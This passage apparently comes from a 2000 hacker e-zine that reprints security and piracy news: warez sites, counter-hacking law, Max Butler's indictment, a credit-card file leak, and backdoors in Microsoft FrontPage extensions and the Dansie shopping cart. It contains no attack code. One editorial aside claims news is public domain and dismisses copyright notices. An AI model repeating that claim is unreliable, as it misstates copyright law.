a free copy of applications such as Windows 2000, Adobe Photoshop and Corel Draw; computer games such as Quake 3, KingPin and Soldier of Fortune; and even movies such as Scream 3, Star Wars and Green Mile. On a serialz page you can retrieve serial numbers for anything from first aid computer programs to multimedia software. And throughout the sitez are banners advertising pornography and links to pages listing passwords to XXX material. "The best illegal downloads" one site advertises; "Illegal MP3 arena" another calls itself; "100% Illegal Pirated O-Day" one boasts. The sites are nothing new, but copyright owners are getting scared. With technological developments set to make it much easier to break the law - broadband will reduce download times dramatically - software companies are concerned. Speaking in Sydney last week, the president of the Business Software Alliance, Mr Robert Holleyman, said there were at least 690,000 warez, appz and crackz Web pages on the Internet. The Business Software Alliance - an international industry body representing software companies such as Microsoft, Lotus, Adobe, Novell and Symantec - estimates Internet piracy now involves more than $US1 billion ($1.67 billion) worth of software worldwide. Mr Jim Macnamara, chairman of the alliance's local counterpart, the Business Software Association of Australia, said technological developments such as broadband and faster modems would aggravate the problem. "It's all necessary for the e-commerce revolution to happen," Mr Macnamara said. "But, equally, we are concerned because illegal software will be easier to access." The sites are not hidden but quite blatant, Mr Macnamara said. "They are quite unashamed. They do not do anything else. They openly boast of what they have got on them." A disclaimer on one site warns: "If you are affiliated with any government, anti-piracy group or any other related group, or were formerly a worker of one, you CANNOT enter this Web site, cannot access any of its files and you cannot view any of the HTML files." The sites say that threats against Internet service providers or prosecutions of people affiliated with the page would breach the US Internet Privacy Act. Mr Macnamara suggested Internet service providers should be required to compile contact details of Web sites owners which would be available to police but not the public. "Individual privacy should be protected but the hosts of sites should be required to keep a record of who owns that site," he said. "If you get a court order you should be able to locate who is doing that and press charges. "Often we do not even know where they are because there's no records kept." But the organiser of hackers group 2600 Australia, Mr Grant Bayley, said most of the sites were hosted on free Web page hosting sites such as Geocities and Angelfire, rather than through ISPs. "A change in law won't achieve any of their objectives," he said. Mr Bayley said 2600 did not condone any of the sites. Hackers were interested in computer security and not breaking the law; crackers access software illegally. "The number of sites alleged to exist seems grossly exaggerated," he said. But Mr Bayley suggested software companies should provide more programs to consumers on a free trial basis. "It's a problem of not offering enough of a sample," he said. "People operating such sites are often under the age of 18 and do so more out of interest in a product than a desire for professional gain. These are people wanting to try out the software." This material is subject to copyright and any unauthorised use, copying or mirroring is prohibited. (We disregard all such notices, news is in the public domain, we don't charge for access to these archives, if anything we're doing the site(s) a favour by disseminating their news. Legal action will result in a civil disobedience action and will incur underground continuance of our zine. - Ed) @HWA 50.0 [HNN] Attacking the Attackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 12th contributed by Evil Wench Just how legal is it to launch a counterattack against an online attacker? Would you be committing just as big a crime as they are? How can you be sure you are counterattacking the correct target? Should laws be passed to legalize hostile responses? CNN http://www.cnn.com/2000/TECH/computing/04/07/self-defense.idg/index.html Can you counter-attack hackers? From... April 7, 2000 Web posted at: 10:17 a.m. EDT (1417 GMT) by Winn Schwartau (IDG) -- You are running a Web site. Making money perhaps, and visitors are seeing your message. Then, according to your perimeter intrusion-detection device, some online goofball or criminal hacker is beating on your door. What are you going to do? In September 1998, the Pentagon reacted to a browser-based denial-of-service attack by the hactivists Electronic Disruption Theater by using offensive applets to shut down the attacking browsers. Clean. Quick. Effective. But the Pentagon lawyers went ballistic within minutes. The techies defending the Pentagon servers had broken too many laws to enumerate - including a military prime directive, "posse comitatus," which forbids the military from taking unilateral actions within the U.S. and against U.S. citizens. In addition, the techies by their actions had committed several federal felonies for which hackers have gone to jail. The simple truth is that it is illegal to disarm your online assailant. Doing so requires that you take some offensive action - send out hostile applets, return fire with your own denial-of-service tools or anything else that will shut down the attack. The net effect is that both the attacker and the victim (who is attacking back) are breaking the law. At first glance, it doesn't make any sense: If you can disarm a knife-wielding mugger, why can't you disarm your electronic mugger? But in the physical world, you know who is mugging you. During the physical attack there is a person with a knife, and while you may not know his name or see his face, you are 100% sure that the knife you are taking away is in the hands of a bad guy. In the networked world, though, you cannot be sure the guy (IP address) that seems to be attacking you is really the one attacking you. For example, many of the zombie-based, distributed denial-ofservice attacks that occurred in February were traced back to benign networks which were merely unwitting hosts to remote-triggered Trojans located on their servers. Hostile perimeter defense is a really tough problem, and right now the law protects the bad guys more than the good guys. I don't have a perfect solution to this conundrum, but a few thoughts do come to mind: Let the industry design a set of hostile response tools that will stop an attack, but minimize harm just in case a zombie is in the middle. Then, legalize the use of these tools. Legalize hostile responses, and zombie computers be damned if their security is so bad that their networks can be compromised. Build a hardened back-channel on the Internet which will provide fast routing so that trace-back and bad-guy ID is easier, faster, and with the cooperation of the ISP community, automatic. Develop an Internet-based Caller ID system so that Web sites know who's there, what they're doing and can ignore all anonymous requests. Do nothing: Let the bad guys continue to win. So in the spirit of the networked community, I'm asking readers to help out: What do you think is a fair and efficient way of disarming online assailants to protect your net? Be creative, let loose; write laws or design technology. And send me your ideas. Maybe together we can get something done. @HWA 51.0 [HNN] More EZines Released ~~~~~~~~~~~~~~~~~~~~~~~~~~ April 12th contributed by dave920 The second issue of HYPE has been released by Black Market Enterprises featuring w00w00.org. HWA Hax0r News is up to issue number 52. BME HWA Hax0r News http://www.b-m-e.com/features.hype.w00w00.html http://www.csoft.net/~hwa/HWA-hn52.txt @HWA 51.1 [IND] HYPE - w00w00 zine ~~~~~~~~~~~~~~~~~~~~~~~~ w00w00 by dave920 page 1 of 2 So I decided it was time to release HYPE : Issue 2. I sent notice to BME Online's mailing list that I was looking for another candidate to honor for their contributions, and sure enough I was contacted by an online friend (that I've actually met in person as well): xm of geekmafia. He suggested that I take a gander at w00w00.org, a web address that I had not even heard of before. Since I didn't even recognize it, I decided that I would follow his suggestion and see what w00w00 was all about. I was welcomely surprised. I learned that this organization was one of the largest of its type (which made me feel a bit inferior for not knowing about them before this). w00w00 is a compliation of many things, mainly focused on being a computer security forum, "where people could share technical information and become involved with some of the top people in the industry." I was immediately interested. w00w00 is a very relaxed organization and always expanding. It grew because there was nothing like it that preceded its existance. In the words of shok, which I agree with tremendously, "w00w00 is a freedom and not a restriction." I contacted shok with my request to have w00w00 be the cover for this issue of HYPE, and he agreed. The following is the interview that took place. w00w00 by dave920 page 2 of 2 dave920: What caused w00w00 to arise as an organization? w00w00: Well, it was not intentionally created. However, the reason that it succeeded, was the lack of technical security forums, where people could share technical information and become involved with some of the top people in the industry. w00w00 is serving as something of a Studio 54, where acceptance into the group is based on technical knowledge and not reputation. There are limitations to other forums such as Phrack, L0pht, and BugTraq. Phrack is a zine, not a forum. L0pht serves a similar purpose but has been "closed" to all but a small few. BugTraq is a moderated and fairly uninteractive email forum. w00w00 is the only one offering technical information on such a wide scale. All members have a very different background (different areas of knowledge, different countries, different languages, etc.). What was the original focus of w00w00, and how has that changed since its foundation? At first we tried to keep things very technical. Over time, it became relaxed and people published work when they felt like it. The group grew tremendously as a result of it. w00w00 is a loose association, in that people can continue to work where they do or affiliate with other groups. w00w00 is a freedom and not a restriction. How do you feel that your organization has benefitted the Internet community? In the same regards, how has w00w00 benefitted from it? We've offered a forum unparallel to any other for the security community. We've allowed all kinds of people to get together for a common cause (very similar to a security conference, but online and available 365 days a year). Without the Internet, w00w00 wouldn't be possible, as we're entirely Internet-based. What specific steps have you taken to further the advancement of w00w00? We intentionally went for diversity, so that each member could grow from the others. We've always allowed bright people to get involved, and we've had key involvements with other groups and companies to increase the commonwealth of the group and share resources. How has your understanding of the computer underground changed through the development of w00w00? Hmm, interesting question. I would say that it allows us to see the computer security community from both a corporate (many members work for large security firms) and a security group view, that large corporations don't have access to. It's allowed us to interact with both sides. As far as how its changed our understanding, I can't say it has. What I would say is that it brought the different understandings of different members and merged them into a common one. What would you say is the most significant accomplishment that w00w00 has made? Growing into not only the world's largest non-profit security organization, but by far the most diverse in geographic distribution, ethnic distribution, and technical distribution. What do you plan for the future of your organization? Continue to share information, continue to publish or work, and continue to grow, grow, grow. @HWA 52.0 [HNN] Max Vision Goes to Court ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 13th contributed by lseek99 After being hit with a fifteen count indictment last month Max Vision (Max Butler) returned to court to hear the judge set the timetable for the trail. Max vision has been charged with interception of communications, computer intrusion and possession of stolen passwords in connection with cyber intrusions of Department of Defense computer systems in the Spring of 1998. Max had created the open source catalog of IDS signatures known as arachNIDS as well as maintained whitehats.com. Security Focus http://www.securityfocus.com/news/18 "White Hat" Hacker in Court Open source hacker "Max Vision" aided the FBI while allegedly cracking the Pentagon. By Kevin Poulsen April 13, 2000 12:26 AM PT A 27-year-old computer security expert and former FBI source returned to federal court in San Jose, California Wednesday, where he stands accused of penetrating a string of defense department and civilian computers. Max Butler, known as "Max Vision" to friends and associates, was slammed with a fifteen count indictment last month charging him with interception of communications, computer intrusion and possession of stolen passwords in connection with an alleged hacking spree in the Spring of 1998. At Wednesday's appearance, Judge James Ware set a new date of May 8th for laying down the timetable of deadlines and court appearances that lead to trial. Butler's indictment sent shockwaves through the close-knit community of computer security experts who specialize in the arcane science of intrusion detection - the careful analysis of Internet traffic for "signatures" indicative of an attack. Butler is noted for creating and maintaining arachNIDS, an open source catalog of attack signatures that could be thought of as a clearinghouse of clues for Internet cybersleuths, and is part of an overall public resource that Butler created at WhiteHats.com. In the parlance of hackers, "white hats" are ethical and law abiding -- distinguishable from "black hats" who crack computers without permission, and "gray hats" who fall somewhere in between. Martin Roesch, Director of Forensic Systems at network security startup Hiverworld, says that until last month, there was no doubt what color Butler's "hat" was. "He donated an immense amount of time to open source security, and he did a hell of a job." says Roesch. "Everyone's using arachNIDS." 'Butler has provided useful and timely information on computer crimes in the past' -- FBI affidavit Roesch recruited Butler to join Hiverworld as Vulnerability Engineer, luring him away from the consulting work and penetration testing he performed as Max Vision Network Security. According to Hiverworld, Butler passed a background check, and was to start work on March 21st. He didn't make it. "The day he was supposed to start he said he was unable to come in... and that he would catch up with me in a day or two," recalls Hiverworld CTO David Cruickshank. "That night, I had fallen asleep with the TV on, and I woke up when I heard his name on the news." Known Vulnerability Butler self-surrendered to authorities on March 21st, the day he was to begin his new job. He's charged with cracking systems at McChord Air Force Base, NASA's Marshall Space Flight Center, the Argonne and Brookhaven National Labs, IDSoftware, and an unspecified Defense Department system. Another count alleges he unlawfully possessed 477 customer passwords from Aimnet, an ISP. He plead not-guilty, and was released on March 24th on $100,000 in signature and property bonds posted by friends in the open source community, a dozen of whom reportedly flocked to the courtroom in support of Butler. According to an FBI affidavit dated July 2nd, 1998, executed by agent Peter Trahon of the Bureau's San Francisco Computer Crime Squad, the investigation that led to Butler began in May of that year, when the Defense Department began suffering a rash of intrusions exploiting a "recently discovered" vulnerability in a common piece of software called BIND. The devastating security hole formally known as the "iquery BIND Buffer Overflow vulnerability" was publicly announced by Carnegie Mellon's Computer Emergency Response Team (CERT) on April 8th, 1998, by which time a new version of BIND without the bug was available. But a month later, according to the affidavit, hackers were still using it to crack Air Force systems, nuclear laboratories, the U.S. Departments of Commerce, Transportation and the Interior, as well as the National Institute of Health. According to the statement, on May 21st, 1998 an Air Force investigator tracked an intruder from McChord Air Force Base back to a computer at Los Angeles Community College, which proved to be a staging ground for BIND buffer overflow attacks on military sites all around the country. Connection logs obtained from the college under a court order lead to a particular Internet address at an ISP, where records obtained under a second court order completed the trace to Max Butler's home telephone number. The telephone number was familiar to the FBI. "Max Butler is well known to the [agents] of the Computer Crime Squad," the 1998 affidavit reads. "Butler has been a confidential source... for the FBI for approximately 2 years. He has provided useful and timely information on computer crimes in the past." The affidavit notes that their source "has the ability to develop techniques for, and commit, a sophisticated computer intrusion such as the ones described herein." "Hacker Witch-Hunt" The FBI searched Butler's home on July 2nd, 1998. But according to his lawyer, the raid didn't stop the Computer Crime Squad from returning to Butler for more help. Defense attorney Jennifer Granick, says her client's cooperation with the FBI never involved informing on other people. "They used him for technological help, and then they pressured him to do more than that, and to do things he didn't want to do," says Granick. "They continued to seek his assistance even after he became a suspect in this case." [Granick has contributed to SecurityFocus.com.] "The government then turns around in court and says he's dangerous and he's a flight risk, even though they had continued to want to work with him," says Granick, who declined to comment on other details of the case. Assistant U.S. Attorney Ross Nadel -- Butler's prosecutor and the head of Silicon Valley's "Computer Hacking and Intellectual Property" (CHIP) unit -- didn't return phone calls Wednesday. Butler is under advice from Granick not to speak to the press, and he didn't answer an email inquiry. But in an April 3rd message to an intrusion detection forum, Butler commented on what he termed the "frenzy of the hacker witch-hunt." "I am innocent until proven guilty and would appreciate the recognition of this by our community," writes Butler, who also vows to continue his work on open source security, though at a reduced capacity. "Due to my unusual circumstances, the focus of my activities will shift to more professional work and less pure research... I'll do what I can as the situation allows." Butler also railed against Hiverworld, which withdrew its employment offer after learning of his indictment. "[T]he corporation expressed cowardice that is deplorable. I can't tell you how disappointed I was to feel the complete lack of support from the Hive," wrote Butler. Hiverworld's Cruickshank says the company had no choice. "We're a security start up that does intrusion detection and vulnerability scanning, so having a person on staff who is under suspicion for major hacking incidents is probably not the best idea in the world," says Cruickshank. "As a security company," Cruickshank adds, "it's really important for us to have white hats on board." @HWA 53.0 [HNN] Mitnick On the Corporate Conference Circuit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 13th contributed by Weld Pond Kevin Mitnick is making the rounds of the corporate conference circuit. In Salt Lake City next week he will lead a three-person panel discussion on cyber security issues. He will join Rob Clyde, vice president of security management at AXENT Technologies, Inc., and Kelly White, senior consultant with Context Integration in a discussion of cyber security issues. PR Newswire - via Excite http://news.excite.com/news/pr/000412/ut-uita-nettrends Kevin Mitnick, Reformed Hacker, to Lead Cyber Security Panel at UITA's NetTrends 2000 Information Security Experts to Give Utah Businesses a Wake-up Call Updated 3:25 PM ET April 12, 2000 MIDVALE, Utah, April 12 /PRNewswire/ -- One of the most visible computer hackers in the world will be in Salt Lake City next week to lead a three-person panel discussion on cyber security issues. Kevin Mitnick has spent more than six of the last 20 years in jail or prison for various technology related crimes. He was most recently released from a medium-security federal prison in Lompoc, California after being incarcerated for more than four years. Next Wednesday Mitnick will join Rob Clyde, vice president of security management at AXENT Technologies, Inc., and Kelly White, senior consultant with Context Integration, in what is expected to be a free-wheeling panel discussion on cyber security issues facing businesses and governments in Utah and around the world. The 75-minute cyber security panel discussion will be held from 1:00 p.m. to 2:15 p.m. on Wednesday, April 19 at the Salt Palace Convention Center in Salt Lake City. The panel discussion is part of a two-day event, April 19 and 20, produced by the Utah Information Technologies Association called NetTrends 2000: The Digital Revolution. "The Cyber Security panel will provide invaluable security information to business leaders," said Richard Nelson, president and chief executive officer of UITA. "Our panel of experts has nearly 50 years of combined experience in information security. But what makes this panel truly unique is the diversity of experience our panelists have. Rob has spent his career creating computer security systems, Kelly has studied and tested security systems and Kevin has built his expertise in circumventing these systems. Together the three will discuss the real security issues facing businesses today and the best solutions to effectively protect systems from intrusion." Mitnick is recognized by many as one of the most visible hackers in history, including breaking into computer systems at some of the world's largest corporations. As a reformed hacker, Mitnick's expert commentary has been broadcast on CBS's 60 Minutes, CNN, Fox and CourtTV. In March 2000, he testified before the United States Senate in committee hearings to explore ways to make computer systems safer from intruders. As a founder of AXENT Technologies, Robert Clyde was a primary developer of AXENT's original security management products and launched its security consulting services. (AXENT is a provider of enterprise security solutions for distributed computer environments.) Clyde has more than 20 years of experience in security product development, management and consulting. He has provided security consulting to Fortune 1000 companies and financial institutions, advising CIOs and IT managers on how to solve security problems at an enterprise level. Clyde is also a sought-after speaker at security-related conferences. Kelly White is a senior consultant with Context Integration, a provider of business-to-business e-commerce solutions. Prior to joining Context Integration, White was an Internet security specialist with Ernst & Young LLP. As a security consultant, White conducted Internet attack and penetration studies and designed Internet security architectures for Fortune 1000 companies. NetTrends 2000, Utah's premier IT conference, is focused on providing Utah IT professionals with insights regarding today's best e-Business models, future technologies and emerging trends. NetTrends 2000 will be held April 19-20 at the Salt Palace Convention Center in Salt Lake City, Utah. NetTrends 2000 is a day and a half event running from 8:00 am to 4:00 p.m. on April 19 and from 8:00 a.m. to 11:45 a.m. on April 20. The cost is $195 for UITA members and $295 for non-members. To register online, visit www.uita.org or call Jennifer at 801-568-3500. Utah Information Technologies Association is a non-profit organization comprised of Utah information technology professionals dedicated to providing services and events that enhance the growth of Utah's IT community, consisting of over 2500 IT enterprises, through networking, capital formation, skilled workforce development, positive media recognition, public policy advocacy and marketing opportunities. For more information about UITA or NetTrends 2000 visit www.uita.org or call 801-568-3500. Contact: Richard Nelson of UITA, 801-568-3500, rnelson@uita.org; or David Politis, dpolitis@politis.com, or Stephanie Dullum, sdullum@politis.com, both of Politis Communications, 801-523-3730, for Utah Information Technologies Association @HWA 54.0 [HNN] AOL Liable for Music Piracy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 13th contributed by root66 A German court has ruled that AOL Germany is liable for pirate music held on its servers. The ruling stems from a case filed by Hit box in 1998. AOL says it will appeal and that there is no technical way that it can monitor all its content all the time. USA Today http://www.usatoday.com/life/cyber/tech/review/crh053.htm 04/12/00- Updated 11:45 AM ET German court: AOL liable for music piracy MUNICH, Germany (AP) - In a ruling that could give the music industry a weapon against Internet piracy, a court said Wednesday that America Online is responsible when users swap bootleg music files on its service. The case before a Bavarian state court in Munich originated with Hit Box Software, a German company that sued AOL Germany for copyright violation in 1998 after discovering that its digital music files were being exchanged on the online service. An attorney for Hit Box, Stefan Ventroni, hailed the ruling as an important step toward giving musicians better protection against unauthorized use of their performances on the Internet. ''With this verdict, they can demand that such Internet pages be blocked,'' he said. AOL Germany said it would appeal. It argued that it lacks technical means to monitor the service's huge data flow and that it had closed down the forum where music was illegally swapped after learning of it. ''Total control of all pages on our servers is technically almost impossible,'' said Alexander Adler, a spokesman for AOL Germany. ''Also, that would amount to censorship.'' At issue were three instrumental versions of pop hits, including Get Down by the Backstreet Boys, intended mainly for use as karaoke soundtracks. Hit Box said each track, which normally costs up to $15 on a CD, was downloaded for free more than 1,000 times via AOL. Hit Box demanded about $50,000 in damages, but the court put off a ruling on the size of the award. Gema, Germany's main music licensing group, said the verdict was a signal that Internet services need to introduce technologies to protect copyrights online. ''The Internet is not a lawless space,'' spokesman Hans-Herwig Geyer said. ''Right now, the rights of creative artists are being trampled on in the Internet.'' -------------------------------------------------------------------------- ------ Copyright 2000 Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed. @HWA 55.0 [HNN] Canadian ISP Reveals Credit Card Numbers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 13th contributed by Chris Look Communications (formerly Internet Direct) allowed a file containing personal information on over 1,000 people, including credit card numbers to be accessible to anyone via the web. The file was in place for over five days after the company was first notified before it was removed. Toronto Star National Post http://www.thestar.com/thestar/back_issues/ED20000411/news/20000411NEW03_CI-CREDIT.html http://www.nationalpost.com/financialpost.asp?f Star: Credit card files turn up on the Net Security breach at service provider By Kerry Gillespie Toronto Star Staff Reporter More than 1,000 confidential records - including credit card numbers - were accessible on the Internet for at least five days because of a security breach at one of Canada's largest service providers. A man surfing the Internet stumbled on the file and notified Look Communications, formerly Internet Direct, of their problem on April 5. The file disappeared briefly, but returned and was still there last night when The Star called. Nearly three hours later, the file was gone. ``We're shutting the whole thing down now and, frankly, I'll shut down the whole system if I have to,'' Gary Kawaguchi, a shaken senior vice-president said last night. He had no idea how the security breach occurred or why the company hadn't managed to deal with it when first notified. ``This whole thing is going to prompt us to have a third party security scan on everything we do,'' Kawaguchi said. Look Communications has some 175,000 customers across the country. But most of the addresses on the file were from Ontario. The man who found the file and doesn't want his name used got in touch with K. K. Campbell, a Star columnist who writes about the Internet for the Fast Forward section, after the company failed to fix the problem. ``I've been writing about this for close to 10 years and I've never seen one so close to home,'' Campbell said. It was Toronto Councillor Jack Layton's name that first jumped out at him. ``That's a bit scary to think it's that easily accessible,'' Layton said, when notified that an older credit card of his was on the list. ``I wonder how many thousands of dollars in fraudulent transactions have gone on. The company certainly owes people an explanation.'' Kawaguchi said they notified the credit card companies last night. The list contained names of people who subscribed to Ipass, a global roaming service for the Internet that allows users to pay local rates instead of long distance charges. Jacqueline Miller, a graduate student who does a lot of work abroad, applied for the service to save money. While upset that her American Express card number was out in the open, Miller wasn't surprised. When she originally tried to sign up for the Ipass service over the Internet, the screen told her it wasn't a secure Web site. ``So I did it all verbally by the phone, because I refused to use their Web site,'' she said. ``I told them at the time, but they insisted `No, it is secure.' '' Chris Davis, an Internet security specialist, said he was shocked. ``Any of those people on that list could sue that company,'' said Davis, CEO of HeXedit Network Security Inc., from his Ottawa home last night. Credit card information is supposed to be sent from the user to the company on a secure encrypted link, he said. Once it reaches the company it is un-encrypted for use but should then be destroyed. @HWA 56.0 [HNN] Vatis Concerned About Spoofing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 13th contributed by acopalyse Micheal Vatis, director of the FBI's National Infrastructure Protection Center has said that spoofing makes it very difficult for the law enforcement to determine where an attack originates from. Vatis proposed two possible solutions, enable civilians not bound by the fourth amendment to conduct investigations or to somehow defeat spoofing with better technology. Computer Currents http://www.currents.net/newstoday/00/04/13/news4.html @HWA 57.0 [HNN] L0pht Releases CRYPTOCard Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 13th contributed by Silicosis L0pht Labs at @Stake has released an advisory regarding the Palm Pilot implementation of CRYPTOCard, a software challenge/response user authentication system. L0pht has found that the users PIN can be determined form the .PDB file stored on the Pilot. CRYPTOCard Corporation has already provided a list of recommendations. L0pht Labs at @Stake Crypto Card Corporation http://www.l0pht.com http://www.cryptocard.com @HWA 58.0 [HNN] Phone Company's Announce Security Initiative ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 13th contributed by ts Mobil phone companies Ericson, Nokia, and Motorola have announced a new initiative to secure online e-commerce via mobile phones by creating an open global industry framework for more secure transactions. The companies said that they would issue technical bulletins about the initiative by the end of May. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2531636,00.html?chkpt Cell phone giants in Net security pact The world's top three mobile phone manufacturers teamed up to develop an open, global industry framework for safer and simpler business over cell phones. By Kirstin Ridley, Reuters April 12, 2000 5:24 AM PT LONDON -- The world's top three mobile phone manufacturers teamed up on Tuesday in an attempt to secure the growth of e-commerce by developing an open, global industry framework for safer and simpler business over cell phones. Dismissing concerns that current Internet-enabled phones are unsafe, Sweden's Ericsson (Nasdaq: ERICY), Motorola (NYSE: MOT) of the United States and Finland's Nokia (NYSE: NOK) called on industry peers to jump aboard their initiative and ensure that customers can use mobile phones for trusted, electronic transactions. "A mobile device will be the platform to bridge the virtual and physical worlds of e-business," said Matti Alahuhta, president of Nokia's mobile phones division. "Integrating security and transaction applications on a common core standard and platform will create a global mass market for mobile e-business," he added. Encoding data sent over airwaves, establishing its authenticity, ensuring confidentiality and preventing its unauthorized modification and use is seen as vital to unleash the potential for a booming virtual business world. And the companies said the initiative is the key to ensure that growth projections are met. Ericsson forecasts there will be around 1 billion mobile telephone users and some 600 million mobile Internet subscribers worldwide by 2004. WAP phones need WIM Alahuhta conceded that WAP (Wireless Application Protocol) mobile phones, which allow Internet access, carry no guarantee that transactions are being made by the phone's owner. The answer lies partially in WAP security functions such as WTLS (Wireless Transport Layer Security) and WIM (Wireless Identification Module), which will act as a user ID for access to the Internet and offer the authentication for e-business that cell phone Internet transactions currently lack. The three industry heavyweights said their initiative went further than that of Radicchio, a 36-member consortium of technology and telecom firms across Europe, the United States and Japan that has also called for more secure mobile e-commerce. Radicchio backs Finnish Sonera's technology solution, a so-called public key infrastructure (PKI)-based framework, which could be used as a global standard to ensure that any data sent is scrambled into a tough code to make it hacker-proof. Ericsson, Motorola and Nokia also hope to help set up an industry standard for a digital signature that will provide the authentication -- ensuring the identity of users -- that is necessary for secure mobile e-commerce. "The mobile device can be a tool for a variety of services, such as banking and trading services, credit card and payment services, loyalty/bonus services, and ID-card services," the companies said. "The aim is to offer solutions where security and payment services will be integrated as a standard into hundreds of millions of mobile devices in years to come." The three companies said they would issue technical and other details about the initiative by the end of May on their Web sites and hope to formulate an open framework before the summer. @HWA 59.0 [HNN] Microsoft Admits to Backdoor in Server Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 14th contributed by McIntyre Microsoft has admitted that a secret password exists in its Internet Server software. The backdoor, brought to light by Rain Forest Puppy, could allow an intruder complete remote access to the system. Microsoft recommends that the file dvwssr.dll be deleted from Internet Server installations with Front Page extensions installed. The password has been present in the code for at least three years and Microsoft has said that it is conducting an internal investigation. Wall Street Journal - via ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2543490,00.html MS admits planting secret password Microsoft engineers placed a password in server software that could be used to gain illicit access to hundreds of thousands of Internet sites worldwide. By Ted Bridis, WSJ Interactive Edition UPDATED April 14, 2000 12:50 PM PT Microsoft Corp. acknowledged Thursday that its engineers included in some of its Internet software a secret password -- a phrase deriding their rivals at Netscape as "weenies" -- that could be used to gain illicit access to hundreds of thousands of Internet sites worldwide. The manager of Microsoft's security-response center, Steve Lipner, acknowledged the online-security risk in an interview Thursday and described such a backdoor password as "absolutely against our policy" and a firing offense for the as-yet-unidentified employees. The company planned to warn customers as soon as possible with an e-mail bulletin and an advisory published on its corporate Web site. Microsoft (Nasdaq: MSFT) urged customers to delete the computer file--called "dvwssr.dll"--containing the offending code. The file is installed on the company's Internet-server software with Frontpage 98 extensions. While there are no reports that the alleged security flaw has been exploited, the affected software is believed to be used by many Web sites. By using the so-called back door, a hacker may be able to gain access to key Web-site management files, which could in turn provide a road map to such things as customer credit-card numbers, said security experts who discovered the password. Two security experts discovered the rogue computer code -- part of which was the denigrating comment "Netscape engineers are weenies!" -- buried within the 3-year-old piece of software. It was apparently written by a Microsoft employee near the peak of the hard-fought wars between Netscape Communications Corp. and Microsoft over their versions of Internet-browser software. Netscape later was acquired by America Online Inc. One of the experts who helped identify the file is a professional security consultant known widely among the Internet underground as "Rain Forest Puppy." Despite his unusual moniker, he is highly regarded by experts and helped publicize a serious flaw in Microsoft's Internet-server software last summer that put hundreds of high-profile Web sites at risk of intrusion. Almost every Web-hosting provider Russ Cooper, who runs the popular NT Bugtraq discussion forum on the Internet, estimated that the problem threatened "almost every Web-hosting provider." "It's a serious flaw," Cooper said. "Chances are, you're going to find some major sites that still have it enabled." Lipner of Microsoft said the company will warn the nation's largest Web-site providers directly. In an e-mail to Microsoft earlier Thursday, Rain Forest Puppy complained that the affected code threatened to "improve a hacker's experience." Experts said the risk was greatest at commercial Internet-hosting providers, which maintain hundreds or thousands of separate Web sites for different organizations. Lipner said the problem doesn't affect Internet servers running Windows 2000 or the latest version of its server extensions included in Frontpage 2000. The digital gaffe initially was discovered by a Europe-based employee of ClientLogic Corp. (www.clientlogic.com) of Nashville, Tenn., which sells e-commerce technology. The company declined to comment because of its coming stock sale. The other expert, Rain Forest Puppy, said he was tipped off to the code by a ClientLogic employee. When asked about the hidden insult Thursday, Jon Mittelhauser, one of Netscape's original engineers, called it "classic engineer rivalry." @HWA 60.0 [HNN] Backdoor Found in E-Commerce Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 14th contributed by brian Currently being used at over 200 e-commerce sites, Dansie Shopping Cart, contains code that allows the author to remotely enter the system and run code on the server. The back door was discovered by Blarg Online Services which allows someone to remotely enter the server and issue commands to run CGI scripts. There has been no response from Dansie in regard to the allegations. Internet News http://www.internetnews.com/ec-news/article/0,2171,4_340591,00.html Shopping Cart Program Leaves Back Door Open By Brian McWilliams The developer of a highly-rated ecommerce shopping cart is accused of building a software backdoor into the program that could give him or hackers complete control of the server on which it's installed. The Dansie Shopping Cart, which is currently in use at more than 200 e-commerce sites and is recommended by several Web hosting firms, contains code that enables the author, Craig Dansie of Moreno Valley, Calif., to potentially run any command on the Web server. "He doesn't have the right to execute commands on our server without our authorization. That is technically a hack, and he put it into his code deliberately. It's unconscionable," said Joe Harris, a technical support representative at Blarg Online Services in Seattle. Harris discovered the hidden capability while helping a client install the Dansie Shopping Cart, a CGI script written in the Perl language, and publici zed his findings earlier this week on the Bugtraq security mailing list. According to Harris, Dansie built a subroutine into the cart which enables him to use a nine-character form element or password to remotely execute commands on the server using the broad security privileges usually assigned to CGI scripts. But because the password is the same for every installation of the cart, and because the script must be installed with world-readable permission, anybody who has access to a server on which the cart is installed could retrieve the source code and the form element and use it to control other servers, according to Harris. "It takes little imagination to dream up the potential havoc and privacy violations this level of access could result in -- from stealing private customer records to a full-blown crack of an e-commerce server," said Harris. Dansie did not respond to repeated requests for comment. The telephone number listed in the domain record for dansie.net was disconnected sometime Thursday. And a list of several hundred customers was removed from the site Wednesday evening. Licenses for the Dansie cart start at $150 and range up to $650 for the mall version which can handle an unlimited number of merchants on the same server. According to Kasey Johns, Webmaster for Lonestar Badge and Sign of Martindale, Texas, the backdoor in the Dansie cart appears to be a means of protecting against unauthorized installations and of ensuring compliance with the software's licensing terms, which specifically prohibit modifying the source code. Johns said he learned of the backdoor in late March while trying to debug an installation problem. "I tried to make some changes to it, and basically he deleted the script right off of my server. That just doesn't seem right," said Johns. In an e-mail to Johns Wednesday, Dansie accused him of piracy and asserted that "The software has a copyright protection feature that poses NO security risk to your Web site or your Web server." But Johns said Dansie's anti-piracy efforts are over zealous. "I want the right to look at the code, make modifications, and not be locked into whatever ghosts the author has hiding in there," said Johns. According to Allan Knight, Webmaster for ValueWebHosting in Williamsville, New York, which has over 60 hosting clients using the cart, Dansie recently denied that the program passed information back to him. Knight, who has been using the cart for three years, said Thursday he was not aware that the script gave Dansie or others the ability to execute arbitrary commands. But Knight said he had no plans to stop using the software. "I have never had any reason to shed any distrust on Craig whatsoever," said Knight. While Dansie could issue a patch to customers to disable the backdoor, Harris said prudent users will uninstall the software and 